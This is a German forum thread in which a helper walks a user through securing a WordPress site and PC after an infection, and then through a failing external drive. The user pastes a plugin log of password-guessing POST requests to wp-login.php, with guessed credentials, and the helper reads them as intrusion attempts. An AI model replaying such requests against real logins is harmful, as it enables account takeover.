na ob du zb bei der google suche auf die gewünschten ergebnisse kommst etc. wenn ja gibts keine Umleitungen

Das ist nicht der Fall, alles so wie es sein soll. Gibt es sonst noch etwas zu tun? Wie sieht es mit der Internetseite aus, ist die nun wirklich virenfrei und was kann ich hier tun, damit das auch so bleibt?

Danke noch einmal an der Stelle, das war wirklich schon eine große Hilfe!!

Hi,
nutzt du auf der seite ein CMs (wordpress) zb?

Ja, die Seite läuft mit Wordpress. Die neuste Version (3.5.1) ist installiert und mittlerweile auch die neuste Version des Templates. Ich vermute, dass sich über eine veraltete Templateversion die Viren eingeschleust haben, da ich hier auch die infizierten Dateien gefunden habe.

Hi
hast du schon mal alle unnötigen templates, themes, plugins gelöscht?
trag dich in den wordpress newsletter ein, damit du immer infos über Updates bekommst

Updates werden mir normalerweise auch im Adminstrationsbereich angezeigt, aber ich trage mich jetzt auch mal für den Newsletter ein. Es sind nur auch benötigte Plugins, Templates und Ähnliches installiert.

.htaccess Schutz:
Verzeichnisschutz/Passwortschutz mit htaccess sowie SSI/PHP
wobei ich hier von out type basic wenn möglich abraten würde und auf
Digest
setzen
Wordpress absichern:
http://playground.ebiene.de/adminber...ess-schuetzen/
wobei man schauen muss ob die Plugins unter 9 noch laufen.
das ansehen:
WordPress › WP Security Scan « WordPress Plugins
WordPress › Bad Behavior « WordPress Plugins

Danke für die Links! Die beiden Plugins habe ich mal installiert und konfiguriert. Durch die beiden anderen Links werde ich mich bei Gelegenheit mal durcharbeiten.

Du musst aber bei dem einen Plugin, welches die Berechtigungen prüft, auch tätig werden, oder war da alles io?

Das Plugin sagt mir, dass ich eine .htaccess einrichten soll, das werde ich noch tun. Außerdem soll ich meinen Tabellen-Präfix vom MySQL ändern, hier scheitere ich im Moment noch an dem Punkt "The database user you're using with WordPress must have ALTER rights. (No)", das kriege ich nicht hin.

Was ich mich allerdings frage, das ist aus dem Log des "Bad Behavior"-Tools. Sind das irgendwelche Versuche, mein Admin-Konto zu hacken? Lustigerweise ist das gar nicht unter dem Benutzernamen "admin" zu erreichen..

bitte als Klartext posten.
dieses tool blockt zugriffe von ips, die zb als spammer negativ aufgefallen sind, zum htaccess schutz hatte ich ja oben einen link gepostet.
Wegen der anderen Meldung, hilft das evtl?
WordPress › Support » [Plugin: WP Security Scan] How do I add ALTER rights to my database

Den Link hatte ich auch schon gefunden. Leider hilft das nicht weiter oder das ist zu hoch für mich, eins von beidem...

Hier als Klartext, solche Einträge gibt es dort immer wieder. Meist mit irgendwelchen "einfachen" Wörtern als Passwort und wechselnden IPSs

Zitat:

178.255.225.89
89.225.255.178.static.occentus.net

2013-02-20 15:17:24

Required header 'Accept' missing POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Connection: close
Accept-Encoding: gzip, deflate
Host: www.tus-schildgen.de
Referer: hxxp://www.tus-schildgen.de/wp-login.php
log: admin
pwd: madden
wp-submit: Log In
redirect_to: hxxp://www.tus-schildgen.de/wp-admin/
testcookie: 1
46.32.226.96
ds-61525.ds-10.com

2013-02-20 15:17:21

Required header 'Accept' missing POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Connection: close
Accept-Encoding: gzip, deflate
Host: www.tus-schildgen.de
Referer: hxxp://www.tus-schildgen.de/wp-login.php
log: admin
pwd: madden
wp-submit: Log In
redirect_to: hxxp://www.tus-schildgen.de/wp-admin/
testcookie: 1
118.69.198.230

2013-02-20 15:17:19

Required header 'Accept' missing POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Connection: close
Accept-Encoding: gzip, deflate
Host: www.tus-schildgen.de
Referer: hxxp://www.tus-schildgen.de/wp-login.php
log: admin
pwd: madden
wp-submit: Log In
redirect_to: hxxp://www.tus-schildgen.de/wp-admin/
testcookie: 1
118.69.198.230

2013-02-20 15:09:11

Required header 'Accept' missing POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Connection: close
Accept-Encoding: gzip, deflate
Host: www.tus-schildgen.de
Referer: hxxp://www.tus-schildgen.de/wp-login.php
log: admin
pwd: zurich
wp-submit: Log In
redirect_to: hxxp://www.tus-schildgen.de/wp-admin/
testcookie: 1
163.43.132.41
toyomi.komako.net

2013-02-20 15:09:06

Required header 'Accept' missing POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Connection: close
Accept-Encoding: gzip, deflate
Host: www.tus-schildgen.de
Referer: hxxp://www.tus-schildgen.de/wp-login.php
log: admin
pwd: zurich
wp-submit: Log In
redirect_to: hxxp://www.tus-schildgen.de/wp-admin/
testcookie: 1

sind dass denn deine pws?

Nein, definitiv nicht ;)

Dann will sich da wohl wer einloggen.
Deswegen soll man ja auch die Variablen ändern, also zb die Verzeichniss struktur, wie in dem Link von oben beschrieben

Ich habe auf einem anderen Weg den Präfix der MySQL-Datenbank geändert bekommen. Die .htaccess ist ebenfalls erstellt. Alles was das Plugin vorschlägt ist also nun von mir erledigt! Außerdem habe ich noch ein Plugin installiert, was die Anzahle der maximalen Loginversuche in einem bestimmten Zeitraum eingrenzt.

hi
genau, dann noch die 10 Tipps aus dem Link von oben durchgehen.
wenn du noch mehr blog betreiber kennst, die wordpress nutzen, ruhig mal diese links an die leiten, sicherheitslücken in blogs werden Automatisiert gefunden und genutzt, davor sollte man sich und seine Besucher schützen.
Wenn der PC jetzt läuft wie gewünscht:
Öffne OTL, bereinigen, PC startet neu, löscht Remover.
Lösche übrig gebliebene Remover, Logs, setups, leere den papierkorb.
PC absichern:
als antimalware programm würde ich emsisoft empfehlen.
diese haben für mich den besten schutz kostet aber etwas.
Computeractive Software Store - Emsisoft Anti-Malware 7 [1-PC] - 63% off RRP
testversion:
Meine Antivirus-Empfehlung: Emsisoft Anti-Malware
insbesondere wenn du onlinebanking, einkäufe, sonstige zahlungsabwicklungen oder ähnlich wichtiges, wie zb berufliches machst, also sensible daten zu schützen sind, solltest du in sicherheitssoftware investieren.
vor dem aktivieren der lizenz die 30 tage testzeitraum ausnutzen.

kostenlos, aber eben nicht ganz so gut währe avast zu empfehlen.
http://www.trojaner-board.de/110895-...antivirus.html

sag mir welches du nutzt, dann gebe ich konfigurationshinweise.
bitte dein bisheriges av deinstalieren
die folgende anleitung ist umfangreich, dass ist mir klar, sie sollte aber umgesetzt werden, da nur dann dein pc sicher ist. stelle so viele fragen wie nötig, ich arbeite gern alles mit dir durch!

http://www.trojaner-board.de/96344-a...-rechners.html
Starte bitte mit der Passage, Windows Vista und Windows 7
Bitte beginne damit, Windows Updates zu instalieren.
Am besten geht dies, wenn du über Start, Suchen gehst, und dort Windows Updates eingibst.
Prüfe unter "Einstellungen ändern" dass folgendes ausgewählt ist:
- Updates automatisch Instalieren,
- Täglich
- Uhrzeit wählen
- Bitte den gesammten rest anhaken, außer:
- detailierte benachichtungen anzeigen, wenn neue Microsoft software verfügbar ist.
Klicke jetzt die Schaltfläche "OK"
Klicke jetzt "nach Updates suchen".
Bitte instaliere zunächst wichtige Updates.
Es wird nötig sein, den PC zwischendurch neu zu starten. falls dies der Fall ist, musst du erneut über Start, Suchen, Windows Update aufrufen, auf Updates suchen klicken und die nächsten instalieren.
Mache das selbe bitte mit den optionalen Updates.
Bitte übernimm den rest so, wie es im Abschnitt windows 7 / Vista zu lesen ist.
aus dem Abschnitt xp, bitte den punkt "datenausführungsverhinderung, dep" übernehmen.
als browser rate ich dir zu chrome:
Installation von Google Chrome für mehrere Nutzerkonten - Google Chrome-Hilfe
anleitung lesen bitte
falls du nen andern nutzen willst, sags mir dann muss ich teile der nun folgenden anleitung anpassen.

Sandboxie
Die devinition einer Sandbox ist hier nachzulesen:
Sandbox
Kurz gesagt, man kann Programme fast 100 %ig isuliert vom System ausführen.

Der Vorteil liegt klar auf der Hand, wenn über den Browser Schadcode eingeschläust wird, kann dieser nicht nach außen dringen.
Download Link:
Sandboxie - Download - Filepony

anleitung:
http://www.trojaner-board.de/71542-a...sandboxie.html
ausführliche anleitung als pdf, auch abarbeiten:
Sandbox Einstellungen |

bitte folgende zusatz konfiguration machen:
sandboxie control öffnen, menü sandbox anklicken, defauldbox wählen.
dort klicke auf sandbox einstellungen.
beschrenkungen, bei programm start und internet zugriff schreibe:
chrome.exe
dann gehe auf anwendungen, webbrowser, chrome.
dort aktiviere alles außer gesammten profil ordner freigeben.
Wie du evtl. schon gesehen hast, kannst du einige Funktionen nicht nutzen.
Dies ist nur in der Vollversion nötig, zu deren Kauf ich dir rate.
Du kannst zb unter "Erzwungene Programmstarts" festlegen, dass alle Browser in der Sandbox starten.
Ansonsten musst du immer auf "Sandboxed webbrowser" klicken bzw Rechtsklick, in Sandboxie starten.
Eine lebenslange Lizenz kostet 30 €, und ist auf allen deinen PC's nutzbar.

Weiter mit:
Maßnahmen für ALLE Windows-Versionen
alles komplett durcharbeiten
anmerkung zu file hippo.
in den settings zusätzlich auswählen:
hide beta updates.
Run updateChecker when Windows starts

Backup Programm:
in meiner Anleitung ist bereits ein Backup Programm verlinkt, als Alternative bietet sich auch das Windows eigene Backup Programm an:
http://www.trojaner-board.de/82962-w...en-backup.html
Dies ist aber leider nur für Windows 7 Nutzer vernünftig nutzbar.
Alle Anderen sollten sich aber auf jeden fall auch ein Backup Programm instalieren, denn dies kann unter Umständen sehr wichtig sein, zum Beispiel, wenn die Festplatte einmal kaputt ist.

Zum Schluss, die allgemeinen sicherheitstipps beachten, wenn es dich betrifft, den Tipp zum Onlinebanking beachten und alle Passwörter ändern
bitte auch lesen, wie mache ich programme für alle sichtbar:
Programme für alle Konten nutzbar machen - PCtipp.ch - Praxis & Hilfe
surfe jetzt also nur noch im standard nutzer konto und dort in der sandbox.
wenn du die kostenlose version nutzt, dann mit klick auf sandboxed web browser, wenn du die bezahlversion hast, kannst du erzwungene programm starts festlegen, dann wird sandboxie immer gestartet wenn du nen browser aufrufst.
wenn du mit der maus über den browser fährst sollte der eingerahmt sein, dann bist du im sandboxed web browser

passwort sicherheit:
jeder dienst benötigt ein eigenes, mindestens 12-stelliges passwort
bei der passwort verwaltung und erstellung hilft roboform
Passwort Manager, Formular Ausfueller, Passwort Management | RoboForm Passwort Manager
anleitung:
RoboForm-Bedienungsanleitung: Passwort-Manager, Verwalten von Passwörtern und persönlichen Daten

Wow, das sind viele Tipps. Danke! Ich werde mich mal ran machen und alles nach und nach abarbeiten. Sollte Probleme auftreten, wende ich mich hier im Thread an dich!? Eine Frage habe ich jetzt schon, mein bisheriges Antiviren-Programm AntiVir soll ich ja deinstallieren. Avast! kann ich also als gute Alternative nutzen? Das würde ich nämlich dann tun.

Ansonsten würde ich gerne bei Firefox als Browser bleiben und nicht auf Chrome umsteigen.

Hi
schon mal chrome angesehen, bietet einige Sicherheitsfeatures mehr als der FF und sollte auch schneller sein, ich rate dir daher, ansehen, deinstalieren kann man ihn ja immernoch.
Konfig hinweise:
Hi,
1. lade Software nur vom Hersteller.
2. informiere dich via google über das, was du instalieren möchtest.
3. instaliere immer Benutzerdefiniert, so kann man häufig Toolbars abwählen.
Malwarebytes Pro nutze ich nicht, sollte aber passen.
True image ist ok.
Roboform gefällt mir gut, aber das ist geschmackssache, anschauen und selber entscheiden :-)

Chrome ansehen, meckern kann man ja hier auch, wieder Geschmackssache :-)
adblock für chrome:
http://filepony.de/download-adblock_chrome/
damit sollte das leben werbefreier von statten gehen.
ghostery um tracking zu verhindern:
http://filepony.de/download-ghostery_chrome/
HTTPS Everywhere
https://chrome.google.com/webstore/d...jekcdonpmejbdp
wählt, wenn möglich, eine sichere Verbindung
sicher surfen mit chrome:
Sicher surfen mit Google Chrome | Verbraucher sicher online

Wenn du über den PC zahlungsverkehr oder einkäufe oder sonst was wichtiges machst, würde ich die 15 € in Emsisoft investieren, pro Jahr.

Ich habe noch eine andere Frage bzgl. der Wordpress-Installation. Das eine Plugin hatte mir ja angezeigt, dass ich den Tabellen-Präfix ändern solle. Ich habe das versucht, nach dieser Anleitung durchzuführen: WP 2.8 Prefix der MySQL-Datenbank von wp_ in eine andere Form NACHTRÄGLICH ÄNDERN

Hat auch augenscheinlich ohne Probleme funktioniert. Allerdings scheinen doch Fehler mit der Datenbank aufzutreten. Beim Hochladen von Bildern beispielsweise bekommen ich untenstehende Fehlermeldung oder das Kalenderplugin zeigt keine Einträge mehr oder ich kann keine Widgets mehr bearbeiten. Solche Probleme treten häufiger auf. Ich habe das Ganze dann wieder rückgängig gemacht, daher von meinem neuen Präfix zurück in "_wp" geändert, das Problem bleibt allerdings bestehen. Kennst du dich hiermit aus und kannst mir weiterhelfen?

Ich hab übrigens geprüft und eine Standard-functions.php hochgeladen. Daran liegt es nicht.

Zitat:

Warning: Cannot modify header information - headers already sent by (output started at /kunden/250402_51467/wp-content/themes/twentyeleven/functions.php:1) in /kunden/250402_51467/wp-admin/async-upload.php on line 32
1062

Ein weiteres Problem ist mir noch aufgefallen: Der PC erkennt meine externe Festplatte nicht mehr richtig. Sie wird zwar korrekt angezeigt und ich kann auch alle Ordner öffnen, diese sind nur meistens alle leer. Manchmal kann ich einzelne Dateien öffnen. Oft erscheint die Fehlermeldung "Der Datenträger in Laufwerk G: ist nicht formatiert. Soll er jetzt formatiert werden?". Was kann ich tun?

Hi
hattest du auch, wie in der anleitung angegeben, die variablen in den php dateien geendert?
wie alt ist die externe platte denn, hast du die evtl. mal ohne sie über hardware entfernen, zu entfernen vom pc abgezogen?

Ja, die Variable in der wp-config.php habe ich geändert. Oben hab ich übrigens was falsches reinkopiert, das hier war die Anleitung, die ich befolgt habe: WordPress sicherer machen | Das WordPress-Buch

Die Festplatte ist eigentlich immer angeschlossen. Kann natürlich sein, dass ich sie irgendwann mal direkt abgezogen habe, normalerweise mach ich das aber über "Hardware sicher entfernen". Wüsste ich jedenfalls jetzt auf Anhieb nicht, auschließen kann ichs aber nicht.

Wegen deiner fehlermeldung, guck mal hier:
php Warning: Cannot modify header information
wegen der festplatte, öffne mal computer, und mache n rechtsklick auf die externe, dann auf eigenschaften, tools und Datenträgerüberprüfung ausführen. alle haken setzen

Habe mal eine Datenträgerüberprüfung gemacht, das Problem mit der Festplatte besteht aber leider weiterhin. Diesselbe Fehlermeldung und Probleme (teilweise leere Ordner, Dateien öffnen nur sehr langsam oder meist gar nicht) habe ich auch, wenn ich die Platte an einen anderen PC anschließe.

Wegen der Fehlermeldung bei Wordpress hat der Link leider nicht weitergeholfen, habe wie beschrieben den Quelltext geöffnet, allerdings gibt es bei mir keinen Code vor dem <br>

Kann ich irgendwie rausfinden, welche Dienste meine Festplatte benötigt? Mir fällt grad ein, dass ich einen HP-Dienst mit CCleaner gelöscht habe, weil ich dachte, dass dieser von meinem Drucker benötigt wird. Allerdings ist die externe Festplatte auch von HP. Könnte hier, obwohl der Fehler ja auch an einem anderen PC auftaucht, ein Zusammenhang mit dem Problem bestehen?

nö, das hat damit nichts zu tun.
sind denn wichtige daten auf der platte, oder könnte man die formatieren.

Leider sind auf der Festplatte ziemlich wichtige Daten. Das ist mehr oder weniger eine Arbeitsfestplatte. Formatieren fällt also ohne die Daten vorher gesichert zu haben raus...

Hi
warum hat man von wichtigen Daten kein Backup.
ist doch klar, dass eine festplatte, die immer angeschlossen ist, nicht so lange hält, wie ein Backup, was im schrank liegt.
http://www.trojaner-board.de/82533-d...ted-magic.html
kommst du über ubuntu an die Daten?

Werde ich versuchen, danke..

Bitte melden obs läuft
wir könnten uns deine page mal ansehen wenn du uns den ftp inhalt irgendwo zur verfügung stellst.
File-Upload.net - Ihr kostenloser File Hoster!
zb gepackt, und als link an mich in ner privaten Nachicht. evtl. finden wir den Fehler noch damit du dann die sichere Konfig machen kannst

Ich hab die Daten jetzt so gut wie alle auf eine andere Festplatte kopiert bekommen, auch ohne Ubuntu. Zwar fehlt mir ein Ordner, allerdings sind dort Dateien, die nicht so sehr wichtig sind. Grundsätzlich könnte ich die Festplatte jetzt also formatieren?!

Ich habe mal den Inhalt von meiner Webseite hochgeladen, den Link schicke ich dir per PN. Die .htaccess musste ich nochmal rausnehmen, die wird aber bei Gelegenheit wieder hochgeladen. Das Problem mit den Datenbanken besteht leider weiterhin...

Hi
ja formatiere die Platte mal

Das Formatieren funktioniert leider nicht. Ich habe zwei mal eine Fehlermeldung erhalten, dass das Formatieren nicht abgeschlossen werden konnte. Mittlerweile wird die Festplatte nur noch als "Lokaler Datenträger" ohne die von mir zugewiesene Bezeichnung erkannt und beim Formatieren tut sich nach dem Start nichts mehr, ich kann nur noch abbrechen. Ich habe die Einstellungen Speicherkapazität: "1,81TB", Dateisystem: "NTFS (Standard)", Größe der Zuordnungseinheiten: "4096 Bytes" gewählt, so wie sie vorgegeben waren. Ich habe keine Häkchen bei "Schnellformatierung" und "MS-DOS-Startdiskette erstelen" gesetzt.

hi
die scheint wohl kaputt zu sein. versuchs mal über ubuntu zu formatieren, evtl. klappt das

Ohne Erfolg, Ubuntu erkennt die Festplatte nichtmals. Garantie wird wohl auch schwer werden, besitze zwar noch den Originalkarton, da steht auch was von zwei Jahren Garantie drauf, eine Garantiekarte oder Ähnliches gibt es nicht. Den Kassenbon (Saturn, 19.10.2012) habe ich leider nur noch eingescannt...

Habe aber in der Datenträgerverwaltung gesehen, dass die Festplatte momentan das Dateisystem "RAW" hat. Über Google finden sich dutzende von Leuten, die ein Ähnliches Problem wie ich haben. Nur eine Lösung habe ich noch nicht gefunden... Aber vielleicht ist das ein Ansatz?!

wie heißt die platte, firma und bezeichnung.

Es ist die "WDBW2A0020HBK-EESN" von HP

Hi lass mal die festplattendiagnose laufen:
http://www.chip.de/downloads/Western..._29715653.html

Fehlermeldung: "Too many bad sectors detected" :-(

Dann werd ichs mal per Garantie versuchen, vielleicht kann ich was erreichen. Schade, scheine wohl irgendwas beim Viren-Entfernen kaputt gemacht zu haben, vorher lief sie einwandfrei...

Nö, also ich hab da nichts kaputt gemacht :-)
wenn die im Dauerbetrieb am pc hängt kann das passieren, solche im dauerbetrib laufenen Platten sind für ein Backup ungeeignet.

War auch nicht auf dich bezogen, vielleicht hab ich irgendwas nicht beachtet. Oder vielleicht wars auch nur der Zufall und zeitgleich hats die Platte zerissen. Schade, wo die doch erst knapp vier Monate alt war..

na da hast aber auf jeden fall ne gute Chance.